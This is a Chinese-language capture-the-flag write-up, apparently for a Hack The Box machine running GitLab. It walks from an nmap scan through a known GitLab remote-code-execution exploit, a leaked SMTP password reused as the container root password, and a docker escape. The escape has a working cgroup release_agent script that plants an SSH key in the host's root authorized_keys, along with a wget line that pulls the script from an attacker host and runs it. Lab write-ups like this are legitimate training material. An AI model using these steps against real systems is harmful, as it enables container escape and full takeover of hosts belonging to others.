基本信息

端口扫描

22和5080:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$ nmap -sC -sV 10.10.10.220
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-16 14:23 CST
Nmap scan report for 10.10.10.220
Host is up (0.068s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open http nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.10.10.220:5080/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.61 seconds

5080

是一个gitlab:

随意注册账号登录,help界面得到版本号:

gitlab rce

这个版本的gitlab存在已知漏洞,以前real world ctf考过:

可以一步步来,也可以exp一键打,打到git shell:

1
python3 -c 'import pty; pty.spawn("/bin/sh")'

docker 提权 & user flag

gitlab是一个docker,在里面查看信息,backup目录里获得密码:

1
gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"

这个密码就是当前docker的root密码,切换过去在用户目录得到user.txt:

docker逃逸

参考资料:

就是按照教程,把自己的ssh公钥写进宿主机,然后直接ssh连接:

1
2
3
4
5
6
7
# docker
wget http://10.10.14.10:7777/miao.sh
chmod +x miao.sh
./miao.sh

# local
ssh root@10.10.10.220

miao.sh

1
2
3
4
5
6
7
8
9
mkdir /tmp/miao && mount -t cgroup -o rdma cgroup /tmp/miao && mkdir /tmp/miao/x
echo 1 > /tmp/miao/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/miao/release_agent

echo '#!/bin/sh' > /cmd
echo "echo 'ssh-rsa ***' > /root/.ssh/authorized_keys" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/miao/x/cgroup.procs"

root flag

然后直接读取root.txt:

参考资料